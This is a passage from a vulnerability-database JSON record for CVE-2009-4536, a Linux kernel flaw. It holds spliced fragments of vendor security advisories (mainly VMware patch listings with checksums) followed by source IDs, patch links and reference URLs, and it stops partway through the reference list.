Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW\nE70An2gfkiCQ5FNqvf3y+kNredxyVZwI\n=JW3s\n-----END PGP SIGNATURE-----\n. Summary\n\n    VMware hosted product updates, ESX patches and VI Client update\n    resolve multiple security issues. \n    VMware Player 3.1.3 and earlier. \n\n    VMware Fusion 3.1.2 and earlier. \n\n    ESXi 4.1 without patch ESXi410-201104402-BG. \n    ESXi 4.0 without patch ESXi400-201104402-BG. \n    ESXi 3.5 without patches ESXe350-201105401-I-SG and\n                             ESXe350-201105402-T-SG. \n\n    ESX 4.1 without patch ESX410-201104401-SG\n    ESX 4.0 without patch ESX400-201104401-SG\n    ESX 3.5 without patches ESX350-201105401-SG,\n                            ESX350-201105404-SG and\n                            ESX350-201105406-SG. \n\n        2) SCSI Driver Denial of Service / Possible Privilege Escalation\n            A local attacker can achieve a denial of service and\n            possibly a privilege escalation via a vulnerability in the\n            Linux SCSI drivers. \n\n        3) Kernel Memory Management Arbitrary Code Execution\n            A context-dependent attacker can execute arbitrary code via\n            a vulnerability in a kernel memory handling function. Multiple vulnerabilities in mount.vmhgfs\n\n        This patch provides a fix for the following three security\n        issues in the VMware Host Guest File System (HGFS). None of\n        these issues affect Windows based Guest Operating Systems. \n\n        1) Mount.vmhgfs Information Disclosure\n            Information disclosure via a vulnerability that allows an\n            attacker with access to the Guest to determine if a path\n            exists in the Host filesystem and whether it is a file or\n            directory regardless of permissions. \n\n        2) Mount.vmhgfs Race Condition\n            Privilege escalation via a race condition that allows an\n            attacker with access to the guest to mount on arbitrary\n            directories in the Guest filesystem and achieve privilege\n            escalation if they can control the contents of the mounted\n            directory. \n\n        3) Mount.vmhgfs Privilege Escalation\n            Privilege escalation via a procedural error that allows an\n            attacker with access to the guest operating system to gain\n            write access to an arbitrary file in the Guest filesystem. \n            This issue only affects Solaris and FreeBSD Guest Operating\n            Systems. \n\n        VMware would like to thank Dan Rosenberg for reporting these\n        issues. VI Client ActiveX vulnerabilities\n\n        VI Client COM objects can be instantiated in Internet Explorer\n        which may cause memory corruption. An attacker who succeeded in\n        making the VI Client user visit a malicious Web site could\n        execute code on the user\u0027s system within the security context of\n        that user. \n\n        VMware would like to thank Elazar Broad and iDefense for\n        reporting this issue to us. \n\n        Affected versions. \n\n        The vSphere Client which comes with vSphere 4.0 and vSphere 4.1\n        is not affected. This is any build of vSphere Client Version\n        4.0.0 and vSphere Client Version 4.1.0. \n\n        VI Clients bundled with VMware Infrastructure 3 that are not\n        affected are:\n        - VI Client 2.0.2 Build 230598 and higher\n        - VI Client 2.5 Build 204931 and higher\n\n        The issue can be remediated by replacing an affected VI Client\n        with the VI Client bundled with VirtualCenter 2.5 Update 6 or\n        VirtualCenter 2.5 Update 6a. \n\n    VMware Workstation 7.1.4\n    ----------------------------\n\nhttp://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0\n    Release notes:\n    http://downloads.vmware.com/support/ws71/doc/releasenotes_ws714.html\n\n    VMware Workstation for Windows 32-bit and 64-bit with VMware Tools\n    md5sum: b52d064dff3e9fb009e0637d59b79c44\n    sha1sum: bf4fe9e901b45e59b33852c4612e90fb77223d64\n\n    VMware Workstation for Linux 32-bit with VMware Tools\n    md5sum: 5f5f25b1cfd8990e46db07788fe0adab\n    sha1sum: d5b4bfe0d22079988a7777dcc0f87a16b494b5f9\n\n    VMware Workstation for Linux 64-bit with VMware Tools\n    md5sum: 68b424f836f63c12b071a791f80b1593\n    sha1sum: a7d1f461830db022af8f9d872c980fc59a83c5d6\n\n    VMware Fusion 3.1.3\n    ---------------------------\n\nhttp://downloads.vmware.com/d/info/desktop_downloads/vmware_fusion_for_the_mac/3_0\n    Release notes:\n\nhttp://downloads.vmware.com/support/fusion3/doc/releasenotes_fusion_313.html\n\n    VMware Fusion for Intel-based Macs\n    md5sum: f35ac5c15354723468257d2a48dc4f76\n    sha1sum: 3c849a62c45551fddb16eebf298cef7279d622a9\n\n    VMware Player 3.1.4\n    ---------------------------\n    http://downloads.vmware.com/d/info/desktop_downloads/vmware_player/3_0\n    Release notes:\n    https://www.vmware.com/support/player31/doc/releasenotes_player314.html\n\n    VMware Player 3.1.4 for 32-bit and 64-bit Windows\n    md5sum: 29dd5fefe40af929dba40185eb6d4804\n    sha1sum: ac00488dd9e412beea2366c167ceb87ed262054f\n\n    VMware Player 3.1.4 for 32-bit Linux\n    md5sum: 75a41b63836d19db34f5551846c8b11d\n    sha1sum: 7350051c0fc781604d1d46bc24003434cbcd3b26\n\n    VMware Player 3.1.4 for 64-bit Linux\n    md5sum: a7fdadfb2af8d9f76571cd06f2439041\n    sha1sum: 90031375a9c10d9a0a5e32be154c856693ad7526\n\n    VMware ESXi 4.1\n    ---------------------------\n    ESXi410-201104001\n    Download link:\n\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-276-20110420-682352/ESXi410-201104001.zip\n    md5sum: 23bd026d6cbca718fe50ed1dd73cfe9d\n    sha1sum: 82fa6da02a1f37430a15a659254426b3d3a62662\n    http://kb.vmware.com/kb/1035111\n\n    ESXi410-201104001 contains ESXi410-201104402-BG. \n\n    VMware ESX 4.1\n    -------\n    ESX410-201104001\n    Download link:\n\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-275-20110420-062017/ESX410-201104001.zip\n    md5sum: 757c3370ae63c75ef5b2178bd35a4ac3\n    sha1sum: 95cfdc08e0988b4a0c0c3ea1a1acc1c661979888\n    http://kb.vmware.com/kb/1035110\n\n    Note ESX410-201104001 contains ESX410-201104401-SG. \n\n    VMware ESXi 4.0\n    ---------------------------\n    ESXi400-201104001\n    Download link:\n\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-278-20110424-080274/ESXi400-201104001.zip\n    md5sum: 08216b7ba18988f608326e245ac27e98\n    sha1sum: 508a04532f0af007ce7c9d7693371470ed8257f0\n    http://kb.vmware.com/kb/1037261\n\n    Note ESXi400-201104001 contains ESXi400-201104402-BG. \n\n    VMware ESX 4.0\n    ---------------------------\n    ESX400-201104001\n    Download link:\n\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-277-20110424-816604/ESX400-201104001.zip\n\n    md5sum: 1a305fbf6c751403e56ef4e33cabde06\n    sha1sum: bc7577cb80e69fbe81e3e9272a182deb42987b3d\n    http://kb.vmware.com/kb/1037260\n\n    Note ESX400-201104001 contains ESX400-201104401-SG. \n\n    VMware ESXi 3.5\n    ---------------------------\n    ESXe350-201105401-O-SG\n    Download link:\n    http://download3.vmware.com/software/vi/ESXe350-201105401-O-SG.zip\n    md5sum: 9bc9296cae1fbecf417f60941590fcb4\n    sha1sum: d6902377f57e3b05b08c07a810d6b58fa30aa8d5\n    http://kb.vmware.com/kb/1036403\n\n    Note ESXe350-201105401-O-SG contains the following security fixes:\n    ESXe350-201105402-T-SG and ESXe350-201105401-I-SG\n\n    VMware ESX 3.5\n    ---------------------------\n    ESX350-201105401-SG\n    Download link:\n    http://download3.vmware.com/software/vi/ESX350-201105401-SG.zip\n    md5sum: 2853ca6e75ef5e856ec582151908ad93\n    sha1sum: c538971d47af4b813348d87bf2f4fa6acd9292f7\n    http://kb.vmware.com/kb/1036399\n\n    ESX350-201105404-SG\n    Download link:\n    http://download3.vmware.com/software/vi/ESX350-201105404-SG.zip\n    md5sum: 7403d4a06e2bdb9cdfb5590432f51bf8\n    sha1sum: 1700d6175524680b982ca4430cff77b5f7cb15c4\n    http://kb.vmware.com/kb/1036402\n\n    ESX350-201105406-SG\n    Download link:\n    http://download3.vmware.com/software/vi/ESX350-201105406-SG.zip\n    md5sum: 6c695f7d021f751959aec08fed94df11\n    sha1sum: 83a862c469e7f3334e2a78f6b81d98c02108b708\n    http://kb.vmware.com/kb/1036754\n\n5. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "BID",
        "id": "37519"
      },
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "db": "PACKETSTORM",
        "id": "86600"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "101970"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-4536",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "37519",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "35265",
        "trust": 2.6
      },
      {
        "db": "SECUNIA",
        "id": "38031",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1023420",
        "trust": 2.5
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/31/1",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/29/2",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/28/1",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38610",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38492",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38276",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38779",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38296",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076",
        "trust": 0.7
      },
      {
        "db": "NSFOCUS",
        "id": "14333",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091229 RE: CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091228 CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091231 RE: CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0020",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0095",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0019",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0041",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-41982",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4536",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86600",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86790",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90046",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "101970",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86286",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "db": "BID",
        "id": "37519"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "PACKETSTORM",
        "id": "86600"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "101970"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "id": "VAR-200906-0612",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      }
    ],
    "trust": 0.43838382
  },
  "last_update_date": "2024-07-23T21:14:24.068000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.15.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1023"
      },
      {
        "title": "kernel-2.6.18-128.14.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1005"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "1992",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1992"
      },
      {
        "title": "2186",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2186"
      },
      {
        "title": "RHSA-2010:0882",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0882.html"
      },
      {
        "title": "RHSA-2010:0019",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0019.html"
      },
      {
        "title": "RHSA-2010:0020",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0020.html"
      },
      {
        "title": "RHSA-2010:0053",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0053.html"
      },
      {
        "title": "RHSA-2010:0079",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0079.html"
      },
      {
        "title": "RHSA-2010:0111",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0111.html"
      },
      {
        "title": "VMSA-2011-0009",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0009.html"
      },
      {
        "title": "kernel-trace-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4935"
      },
      {
        "title": "kernel-debug-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4898"
      },
      {
        "title": "kernel-xen-2.6.27.45-0.1.1.x86_64.rpm",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4939"
      },
      {
        "title": "kernel-debug-debugsource-2.6.27.42-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=5033"
      },
      {
        "title": "kernel-pae-debugsource-2.6.27.42-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=5037"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100020 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100053 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100111 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100019 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100079 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-894-1"
      },
      {
        "title": "VMware Security Advisories: VMware hosted product updates, ESX patches and VI Client update resolve multiple security issues",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=f44ffb8b647b46490ea24f9f9b23fb18"
      },
      {
        "title": "Debian Security Advisories: DSA-2003-1 linux-2.6 -- privilege escalation/denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=c8b001529c4e555fa474fe8cb901ade3"
      },
      {
        "title": "Debian Security Advisories: DSA-2005-1 linux-2.6.24 -- privilege escalation/denial of service/sensitive memory leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=730b40b3a3f2a9a1f3cba6257e5248fb"
      },
      {
        "title": "VMware Security Advisories: ESXi utilities and ESX Service Console third party updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=9ca0d654a28a118d1f99d0ae3b1753e8"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-189",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.securityfocus.com/bid/37519"
      },
      {
        "trust": 2.6,
        "url": "http://securitytracker.com/id?1023420"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/35265"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/38031"
      },
      {
        "trust": 2.1,
        "url": "http://blog.c22.cc/2009/12/27/26c3-cat-procsysnetipv4fuckups/"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=552126"
      },
      {
        "trust": 1.8,
        "url": "http://events.ccc.de/congress/2009/fahrplan/events/3596.en.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/28/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/29/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/31/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0019.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0020.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0041.html"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0095.html"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?t=126203102000001\u0026r=1\u0026w=2"
      },
      {
        "trust": 1.5,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0009.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.debian.org/security/2010/dsa-1996"
      },
      {
        "trust": 1.2,
        "url": "http://www.debian.org/security/2010/dsa-2005"
      },
      {
        "trust": 1.2,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-february/035159.html"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10607"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a12440"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a13226"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7453"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0053.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0111.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0882.html"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38276"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38296"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38492"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38610"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38779"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00005.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00008.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00005.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00007.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00000.html"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55648"
      },
      {
        "trust": 1.0,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4536"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-4536"
      },
      {
        "trust": 0.6,
        "url": "http://support.avaya.com/css/p8/documents/100072895"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/14333"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.3,
        "url": "http://marc.info/?l=linux-netdev\u0026m=126203101730472\u0026w=2"
      },
      {
        "trust": 0.3,
        "url": "http://events.ccc.de/congress/2009/fahrplan//events/3596.en.html"
      },
      {
        "trust": 0.3,
        "url": "http://events.ccc.de/congress/2009/fahrplan//attachments/1483_26c3_ipv4_fuckups.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://permalink.gmane.org/gmane.comp.security.oss.general/2459"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.4/changelog-2.4.37.9"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100141285"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-894-1"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2010-0111.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4020"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.3,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0415"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0410"
      },
      {
        "trust": 0.3,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4021"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0291"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4005"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0622"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4138"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3080"
      },
      {
        "trust": 0.2,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.2,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?t=126203102000001\u0026amp;r=1\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/189.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2010:0020"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=19694"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/894-1/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
